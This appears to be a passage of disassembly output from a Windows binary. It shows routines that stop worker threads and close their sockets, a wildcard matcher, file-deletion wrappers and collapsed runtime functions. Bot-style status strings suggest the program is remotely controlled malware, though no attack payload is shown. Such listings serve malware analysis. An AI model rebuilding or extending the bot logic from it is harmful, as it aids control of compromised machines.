; sub_411E03+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_411DFD
cmp esi, 1F4h
jge short loc_411DFD
imul esi, 234h
push edi
push ebx
push dword_430554[esi]
lea edi, dword_430554[esi]
call ds:dword_41B124 ; TerminateThread
cmp [edi], ebx
jz short loc_411DAD
push 1
pop ebp
loc_411DAD: ; CODE XREF: sub_411D75+33�j
mov [edi], ebx
lea edi, dword_430548[esi]
mov dword_430540[esi], ebx
mov dword_430544[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_411DCE
push eax
call sub_408BC1
pop ecx
loc_411DCE: ; CODE XREF: sub_411D75+50�j
mov [edi], ebx
lea edi, dword_43054C[esi]
mov byte ptr dword_430340[esi], bl
mov byte_430558[esi], bl
push dword ptr [edi]
call dword_42EC48 ; closesocket
lea esi, dword_430550[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_42EC48 ; closesocket
mov [esi], ebx
pop edi
loc_411DFD: ; CODE XREF: sub_411D75+D�j
; sub_411D75+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_411D75 endp
; =============== S U B R O U T I N E =======================================
sub_411E03 proc near ; CODE XREF: sub_403DCB+18�p
; sub_40724A:loc_40726E�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_430340
loc_411E0F: ; CODE XREF: sub_411E03+2A�j
cmp byte ptr [esi], 0
jz short loc_411E20
push edi
call sub_411D75
test eax, eax
pop ecx
jz short loc_411E20
inc ebx
loc_411E20: ; CODE XREF: sub_411E03+F�j
; sub_411E03+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4750D0
jl short loc_411E0F
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_411E03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E35 proc near ; CODE XREF: sub_409557+1851�p
; sub_411EC8+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_430544
loc_411E49: ; CODE XREF: sub_411E35+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_411E6B
test edi, edi
jle short loc_411E5D
cmp [esi], edi
jz short loc_411E5D
cmp ebx, edi
jnz short loc_411E6B
loc_411E5D: ; CODE XREF: sub_411E35+1E�j
; sub_411E35+22�j
push ebx
call sub_411D75
test eax, eax
pop ecx
jz short loc_411E6B
inc [ebp+var_4]
loc_411E6B: ; CODE XREF: sub_411E35+1A�j
; sub_411E35+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4752D4
jl short loc_411E49
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_411E35 endp
; =============== S U B R O U T I N E =======================================
sub_411E82 proc near ; CODE XREF: sub_40226C+B�p
; sub_4022E3+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_430540
loc_411E89: ; CODE XREF: sub_411E82+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_411E92
inc eax
loc_411E92: ; CODE XREF: sub_411E82+D�j
add ecx, 234h
cmp ecx, offset dword_4752D0
jl short loc_411E89
retn
sub_411E82 endp
; =============== S U B R O U T I N E =======================================
sub_411EA1 proc near ; CODE XREF: sub_409557+495D�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_430540
loc_411EAB: ; CODE XREF: sub_411EA1+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_411EC4
add ecx, 234h
inc edx
cmp ecx, offset dword_4752D0
jl short loc_411EAB
pop esi
retn
; ---------------------------------------------------------------------------
loc_411EC4: ; CODE XREF: sub_411EA1+10�j
mov eax, edx
pop esi
retn
sub_411EA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_411EC8(int,int,int,int,int,int,int,char *Str)
sub_411EC8 proc near ; CODE XREF: sub_409557+502A�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
Str = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+Str], eax
jz short loc_411EE1
push [ebp+Str] ; Str
call _atoi
pop ecx
loc_411EE1: ; CODE XREF: sub_411EC8+E�j
push eax
push [ebp+arg_18]
call sub_411E35
pop ecx
test eax, eax
pop ecx
jle short loc_411F0D
push eax
lea eax, [ebp+Dest]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_411F27
; ---------------------------------------------------------------------------
loc_411F0D: ; CODE XREF: sub_411EC8+26�j
push [ebp+arg_14]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax ; Dest
call _sprintf
add esp, 10h
loc_411F27: ; CODE XREF: sub_411EC8+43�j
cmp [ebp+arg_C], 0
jnz short loc_411F47
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
loc_411F47: ; CODE XREF: sub_411EC8+63�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
pop ecx
leave
retn
sub_411EC8 endp
; =============== S U B R O U T I N E =======================================
sub_411F56 proc near ; CODE XREF: sub_4027F8+206�p
; sub_402A0C+238�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_430554[eax], ecx
mov dword_430540[eax], ecx
mov dword_430544[eax], ecx
mov dword_430548[eax], ecx
mov dword_43054C[eax], ecx
mov dword_430550[eax], ecx
mov byte ptr dword_430340[eax], cl
mov byte_430558[eax], cl
retn
sub_411F56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411F93 proc near ; CODE XREF: sub_409557+533F�p
; sub_4120C1+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_411F9D: ; CODE XREF: sub_411F93+68�j
mov cl, [esi]
test cl, cl
jz short loc_411FFD
cmp eax, 1
jnz short loc_411FFD
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_411FFD
cmp cl, 2Ah
jz short loc_411FE4
cmp cl, 3Fh
jz short loc_411FC7
cmp cl, 5Bh
jz short loc_411FCC
xor eax, eax
cmp cl, dl
setz al
loc_411FC7: ; CODE XREF: sub_411F93+26�j
inc [ebp+arg_4]
jmp short loc_411FF7
; ---------------------------------------------------------------------------
loc_411FCC: ; CODE XREF: sub_411F93+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_412029
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_411FF7
; ---------------------------------------------------------------------------
loc_411FE4: ; CODE XREF: sub_411F93+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4120C1
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_411FF7: ; CODE XREF: sub_411F93+37�j
; sub_411F93+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_411F9D
; ---------------------------------------------------------------------------
loc_411FFD: ; CODE XREF: sub_411F93+E�j
; sub_411F93+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_41200D
cmp eax, 1
jnz short loc_412024
inc esi
mov [ebp+arg_0], esi
jmp short loc_411FFD
; ---------------------------------------------------------------------------
loc_41200D: ; CODE XREF: sub_411F93+6D�j
cmp eax, 1
jnz short loc_412024
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_412024
cmp byte ptr [esi], 0
jnz short loc_412024
push 1
pop eax
jmp short loc_412026
; ---------------------------------------------------------------------------
loc_412024: ; CODE XREF: sub_411F93+72�j
; sub_411F93+7D�j ...
xor eax, eax
loc_412026: ; CODE XREF: sub_411F93+8F�j
pop esi
pop ebp
retn
sub_411F93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412029 proc near ; CODE XREF: sub_411F93+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_41204A
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_41204A: ; CODE XREF: sub_412029+19�j
push ebx
push esi
loc_41204C: ; CODE XREF: sub_412029+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_41205A
cmp [ebp+var_4], eax
jnz short loc_4120A6
loc_41205A: ; CODE XREF: sub_412029+2A�j
test edi, edi
jnz short loc_41209B
cmp bl, 2Dh
jnz short loc_41208F
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_41208F
cmp al, 5Dh
jz short loc_41208F
cmp [ebp+var_4], edi
jnz short loc_41208F
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_41209B
cmp bl, al
jg short loc_41209B
push 1
mov [edx], esi
pop edi
jmp short loc_41209B
; ---------------------------------------------------------------------------
loc_41208F: ; CODE XREF: sub_412029+38�j
; sub_412029+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_41209B
push 1
pop edi
loc_41209B: ; CODE XREF: sub_412029+33�j
; sub_412029+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_41204C
; ---------------------------------------------------------------------------
loc_4120A6: ; CODE XREF: sub_412029+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4120B3
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4120B3: ; CODE XREF: sub_412029+82�j
cmp edi, eax
jnz short loc_4120BC
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4120BC: ; CODE XREF: sub_412029+8C�j
mov eax, edi
pop edi
leave
retn
sub_412029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4120C1 proc near ; CODE XREF: sub_411F93+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4120DD: ; CODE XREF: sub_4120C1+3A�j
cmp [eax], bl
jz short loc_4120FD
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_4120F2
cmp cl, 2Ah
jnz short loc_4120FD
cmp cl, 3Fh
jnz short loc_4120F5
loc_4120F2: ; CODE XREF: sub_4120C1+25�j
inc eax
mov [edi], eax
loc_4120F5: ; CODE XREF: sub_4120C1+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4120DD
; ---------------------------------------------------------------------------
loc_4120FD: ; CODE XREF: sub_4120C1+1E�j
; sub_4120C1+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_412108
inc dword ptr [esi]
jmp short loc_4120FD
; ---------------------------------------------------------------------------
loc_412108: ; CODE XREF: sub_4120C1+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_412129
mov edx, [esi]
cmp [edx], bl
jz short loc_41211A
xor eax, eax
jmp short loc_412189
; ---------------------------------------------------------------------------
loc_41211A: ; CODE XREF: sub_4120C1+53�j
cmp cl, bl
jnz short loc_412129
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_412129
push 1
pop eax
jmp short loc_412189
; ---------------------------------------------------------------------------
loc_412129: ; CODE XREF: sub_4120C1+4D�j
; sub_4120C1+5B�j ...
push eax
push dword ptr [esi]
call sub_411F93
pop ecx
test eax, eax
pop ecx
jnz short loc_412173
loc_412137: ; CODE XREF: sub_4120C1+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_41213B: ; CODE XREF: sub_4120C1+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_412153
cmp cl, 5Bh
jz short loc_412153
cmp dl, bl
jz short loc_412153
inc eax
mov [edi], eax
jmp short loc_41213B
; ---------------------------------------------------------------------------
loc_412153: ; CODE XREF: sub_4120C1+82�j
; sub_4120C1+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_41216A
push eax
push dword ptr [esi]
call sub_411F93
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41216F
; ---------------------------------------------------------------------------
loc_41216A: ; CODE XREF: sub_4120C1+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41216F: ; CODE XREF: sub_4120C1+A7�j
cmp eax, ebx
jnz short loc_412137
loc_412173: ; CODE XREF: sub_4120C1+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_412186
mov eax, [esi]
cmp [eax], bl
jnz short loc_412186
mov [ebp+var_4], 1
loc_412186: ; CODE XREF: sub_4120C1+B6�j
; sub_4120C1+BC�j
mov eax, [ebp+var_4]
loc_412189: ; CODE XREF: sub_4120C1+57�j
; sub_4120C1+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4120C1 endp
; [0000002A BYTES: COLLAPSED FUNCTION _wcscat. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41274C proc near ; CODE XREF: sub_4027F8+39�p
; sub_4030D9+2E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4280B0, eax
retn
sub_41274C endp
; [0000001E BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION _strncat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000050 BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
; [0000008B BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION _atoi. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [000000E8 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; [00000120 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_412EA4 proc near ; CODE XREF: sub_403A2F+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_41B0A8 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_412EC4
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
call __dosmaperr
pop ecx
loc_412EC0: ; CODE XREF: sub_412EA4+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_412EC4: ; CODE XREF: sub_412EA4+D�j
test al, 1
jz short loc_412EE5
test [esp+arg_4], 2
jz short loc_412EE5
mov dword_475524, 0Dh
mov dword_475528, 5
jmp short loc_412EC0
; ---------------------------------------------------------------------------
loc_412EE5: ; CODE XREF: sub_412EA4+22�j
; sub_412EA4+29�j
xor eax, eax
retn
sub_412EA4 endp
; ---------------------------------------------------------------------------
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000208 BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _strtoul. PRESS KEYPAD "+" TO EXPAND]
; [000000DC BYTES: COLLAPSED FUNCTION _time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [000000CB BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION _wcslen. PRESS KEYPAD "+" TO EXPAND]
; [000000FF BYTES: COLLAPSED FUNCTION _mbstowcs. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION __splitpath. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION _fgets. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_413BB6 proc near ; CODE XREF: sub_409557+2436�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_41B110 ; DeleteFileA
test eax, eax
jnz short loc_413BCC
call ds:dword_41B060 ; RtlGetLastWin32Error
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BCC: ; CODE XREF: sub_413BB6+C�j
xor eax, eax
loc_413BCE: ; CODE XREF: sub_413BB6+14�j
test eax, eax
jz short loc_413BDD
push eax
call __dosmaperr
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_413BDD: ; CODE XREF: sub_413BB6+1A�j
xor eax, eax
retn
sub_413BB6 endp
; [00000032 BYTES: COLLAPSED FUNCTION _fprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002F6 BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [00000115 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000721 BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_4151EF dd offset $NORMAL_STATE$1535 ; DATA XREF: __output+6E�r
dd offset loc_414B43 ; jump table for switch statement
dd offset loc_414B5E
dd offset loc_414BAA
dd offset loc_414BE1
dd offset loc_414BE9
dd offset loc_414C1E
dd offset loc_414CB1
; [00000035 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; [0000000D BYTES: COLLAPSED FUNCTION _get_int_arg. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION _get_int64_arg. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION _get_short_arg. PRESS KEYPAD "+" TO EXPAND]
; [00000A25 BYTES: COLLAPSED FUNCTION __input. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION __hextodec. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION _fgetc. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __un_inc. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __whiteout. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000005C BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_415F73 proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_415F73 endp
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; [000000D9 BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001F6 BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
; [00000170 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000078 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
; [0000004E BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __positive. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
; [00000104 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
; [0000009B BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __cftoe_g. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __cftof_g. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [000000CC BYTES: COLLAPSED FUNCTION _toupper. PRESS KEYPAD "+" TO EXPAND]
; [000000C2 BYTES: COLLAPSED FUNCTION ___loctotime_t. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000008A BYTES: COLLAPSED FUNCTION __mbsnbcpy. PRESS KEYPAD "+" TO EXPAND]
; [0000008D BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000009A BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [00000158 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
